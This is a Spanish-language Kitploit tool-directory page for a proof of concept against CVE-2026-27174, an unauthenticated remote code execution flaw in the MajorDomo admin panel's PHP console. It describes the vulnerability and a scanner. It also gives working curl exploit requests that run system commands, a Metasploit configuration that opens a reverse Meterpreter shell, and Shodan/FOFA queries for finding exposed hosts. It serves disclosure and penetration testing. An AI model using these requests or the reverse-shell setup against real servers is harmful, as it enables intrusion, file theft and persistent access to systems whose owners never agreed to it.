Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
majordomo-CVE-2026-27174-poc — CVE-2026-27174 - Una ejecución remota de código no autenticada a través de la función de consola PHP del panel de administración | Kitploit
Herramientas/GitHubGitHub/maxmnml/majordomo-cve-2026-27174-poc
Escáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubmaxmnml/majordomo-cve-2026-27174-poc

majordomo-CVE-2026-27174-poc

CVE-2026-27174 - Una ejecución remota de código no autenticada a través de la función de consola PHP del panel de administración

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
hace 5 mesesAún no revisado

majordomo-CVE-2026-27174-poc

Una prueba de concepto que explota una ejecución remota de código no autenticada a través de la consola PHP del panel de administración en MajorDomo (Major Domestic Module).

Vulnerabilidad

El panel de administración de MajorDoMo expone una consola de evaluación PHP a través de /admin.php. Debido a una falta de exit después de una redirección de autenticación en panel.class.php, el manejador AJAX inc_panel_ajax.php se incluye incondicionalmente, haciendo que su eval() sea accesible por cualquier solicitud HTTP no autenticada.

Un atacante puede ejecutar código PHP arbitrario con una única solicitud GET, sin requerir credenciales, acceso previo ni interacción de la víctima.

Versiones Afectadas

  • Todas las versiones de MajorDomo anteriores al parche del 18 de febrero de 2026.

Escáner de Detección

scan.py es un escáner multihilo no destructivo que detecta hosts vulnerables a CVE-2026-27174 sin ejecutar ningún payload dañino.

Cómo funciona

El escáner opera en tres fases secuenciales por objetivo:

root@kitploit:~
Phase 1 — RCE Confirmation
  └─ Sends: echo 'random_marker';
  └─ Checks: marker is reflected in the response body
  └─ Confirms: eval() is reachable without authentication

Phase 2 — PHP Sandbox Profiling
  └─ Sends: echo 'marker:' . ini_get('disable_functions');
  └─ Extracts: list of disabled PHP functions on the server

Phase 3 — OS Execution Surface
  └─ Probes: system, exec, shell_exec, passthru via function_exists()
  └─ Classifies: impact level as HIGH or MEDIUM

Se genera un marcador alfanumérico aleatorio por solicitud para evitar falsos positivos debidos a cachés, WAFs o contaminación de la respuesta.

Uso

Requisitos

root@kitploit:~
pip install requests

1. Preparar un archivo de objetivos

Crea un archivo targets.txt con una IP:PORT por línea:

root@kitploit:~
192.168.1.10:8080
10.0.0.5:80
10.0.0.12:443
# lines starting with # are ignored
# only IP:PORT format is accepted

2. Ejecutar el escáner

root@kitploit:~
python3 scan.py targets.txt

Salida

root@kitploit:~
[+] RCE PHP CONFIRMED -> http://192.168.1.10:8080/admin.php
[-] Not vulnerable -> 10.0.0.5:80

[+] Vulnerable targets exported to results.json

results.json

Se genera automáticamente cuando se encuentra al menos un host vulnerable:

root@kitploit:~
[
    {
        "target": "192.168.1.10:8080",
        "url": "http://192.168.1.10:8080/admin.php",
        "rce_php": true,
        "disable_functions": "popen,pclose,proc_open",
        "system_functions_available": ["system", "exec"],
        "impact_level": "HIGH"
    }
]

Explotación

Basándonos en el resultado del campo system_functions_available del archivo result.json, podemos construir una solicitud GET usando la(s) función(es) de sistema para explotar el RCE:

root@kitploit:~
curl http://192.168.1.10:8080/admin.php?ajax_panel=1&op=console&command=echo+exec('id');
#or
curl http://192.168.1.10:8080/admin.php?ajax_panel=1&op=console&command=echo+system('id');

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Automatización

Módulo de Metasploit:

root@kitploit:~
msfconsole
use exploit/multi/http/majordomo_console_eval_rce
set RHOSTS 192.168.1.10
set RPORT 8080
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 172.17.0.1
check #Verify it returns Vulnerable
run #Verify a Meterpreter session opens as www-data

En estado salvaje

FOFA:

root@kitploit:~
title="MajorDomoSL"

SHODAN:

root@kitploit:~
http.title:"MajorDomoSL"

Impacto

Un atacante remoto no autenticado puede:

  • Ejecutar código PHP arbitrario en el servidor
  • Leer archivos sensibles (/etc/passwd, archivos de configuración, credenciales)
  • Escribir webshells PHP para acceso persistente
  • Pivotar a la ejecución de comandos a nivel de sistema operativo si las funciones PHP system, exec, shell_exec o passthru no están deshabilitadas

El impacto efectivo depende de la configuración PHP disable_functions del servidor:

CVSS 4.0 - 9.3 CRÍTICO — CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CVSS 3.1 - 9.8 CRÍTICO — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Remediación y Mitigación

Actualice a la última versión de MajorDomo (Major Domestic Module).

ControlPreviene RCEPreviene Ejecución de SO

Referencias

https://chocapikk.com/posts/2026/majordomo-revisited

https://nvd.nist.gov/vuln/detail/CVE-2026-27174

https://github.com/sergejey/majordomo/pull/1177

Descargo de responsabilidad

Esta herramienta es solo para pruebas de seguridad autorizadas. El acceso no autorizado a sistemas informáticos es ilegal.

Descargar herramienta
CampoDescripción
targetIP:PORT escaneada
urlURL completa donde se confirmó el RCE
rce_phpEjecución de código PHP confirmada (siempre true en los resultados)
disable_functionsConfiguración PHP disable_functions del servidor (null si está vacía)
system_functions_availableFunciones de ejecución del sistema operativo invocables por un atacante
impact_levelHIGH (ejecución de SO accesible) o MEDIUM (solo RCE PHP)
EscenarioNivel de ImpactoDescripción
Sin disable_functionsCRÍTICOEjecución completa de comandos del sistema operativo
Restricciones parcialesALTORCE PHP + ejecución parcial de SO
disable_functions bloquea toda ejecuciónMEDIOSolo RCE PHP (lectura/escritura de archivos, exfiltración de datos)
Aplicar el parche del 18 de febrero de 2026✅✅
Firewall/lista de permitidos de IP en /admin.php✅✅
Endurecimiento de disable_functions❌✅